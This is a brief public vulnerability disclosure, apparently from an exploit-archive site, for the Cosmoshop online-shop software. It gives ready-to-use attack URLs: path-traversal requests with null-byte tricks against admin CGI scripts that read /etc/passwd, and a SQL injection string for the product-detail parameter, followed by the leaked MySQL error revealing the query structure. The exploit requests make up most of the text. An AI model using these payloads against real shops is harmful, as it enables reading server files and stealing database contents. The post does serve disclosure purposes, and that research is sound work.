i am: l0om=0D
page: www.excluded.org=0D 
product: cosmoshop=0D
=0D
1) show all files as admin-user=0D
2) sql injection =0D
=0D
Cosmoshop - Lse (<= )V8.11.106 =0D
=0D
1)	Show all files as an admin-user:=0D
/cgi-bin/admin/bestellvorgang/edit_mailtexte.cgi?file=../../../../../../../../../etc/passwd%00=0D
/cgi-bin/admin/bestmail.cgi?action=view&file=../../../../../../../etc/passwd%00=0D
=0D
=0D
2)	SQL Injection =0D
cgi-bin/lshop.cgi?action=showdetail&artnum=10[' UNION SELECT OR OTHER SQL]&wkid=2002g&ls=d&nocache==0D
=0D
get_artikel_from_db: Fehler bei SELECT artnum,artpreis,artzub,artbild,artmwst,artlayout,artangebot,=0D
artlieferzeit,artinaktiv,artrabattgruppe,special_price,artneu,artstaffel,artpreis_ek,artdate,artbestand,=0D
artbestand_min,artbestand_ignore,artgewicht_netto,artgewicht_brutto,artnum2,artlieferant,artd_abverkauf,=0D
artd_lieferzeit,artlieferdatum,artpreiswunsch,artebay,artnam,artdesc,artausf_1,artausf_2 FROM shopartikel=0D
as a LEFT JOIN shopartikelcontent AS ac ON (a.artnum=ac.artnr AND ac.sprache ='d') WHERE 1 AND artnum='10'' <-- you enter here=0D
=0D
:You have an error in your SQL syntax. Check the manual that corresponds to your MySQL server version for =0D
the right syntax to use near ''10''' at line 1=0D
in sub: main::get_artikel_from_db (/lib/lshopartikel_sql.pm, line 257)=0D
called by: main::get_artikel_content_by_id=0D
=0D
=0D
hopefully this time cosmoshop will be fixed=0D
=0D
best wishes,=0D
l0om=0D